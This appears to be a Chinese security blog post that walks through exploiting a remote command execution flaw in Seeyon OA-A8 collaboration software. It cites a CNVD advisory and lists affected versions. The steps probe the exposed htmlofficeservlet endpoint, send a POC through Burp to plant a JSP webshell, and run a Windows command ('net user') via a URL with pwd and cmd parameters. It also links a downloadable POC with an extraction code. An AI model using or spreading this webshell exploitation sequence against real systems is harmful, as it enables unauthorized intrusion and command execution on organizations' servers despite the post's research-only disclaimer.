致遠OA-A8系統的0day遠程命令執行的實戰
1.環境是實戰,漏洞已經提交,打碼子處理
2.詳細漏洞信息和修補參考CNVD官網查看https://www.cnvd.org.cn/webinfo/show/5095
3漏洞影響範圍
漏洞影響的產品版本包括:
致遠A8-V5協同管理軟件 V6.1sp1
致遠A8+協同管理軟件V7.0、V7.0sp1、V7.0sp2、V7.0sp3
致遠A8+協同管理軟件V7.1
4漏洞的復現
先採集一波url,找到對應版本,這個就不細說了
第一步
先訪問這個路徑,看有沒有開啓遠程Servlet接口暴露
/seeyon/htmlofficeservlet
成功反饋
第二步
搞出Burp進行改包,上POC
發包 回包
這算是寫入了
第三步
調用命令執行
訪問 /test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+net user
附上POC 請勿用非法用途,只供研究和學習
鏈接:https://pan.baidu.com/s/11Yy49Fu5kc2uuisIzPbPLA
提取碼:0qk7
複製這段內容後打開百度網盤手機App,操作更方便哦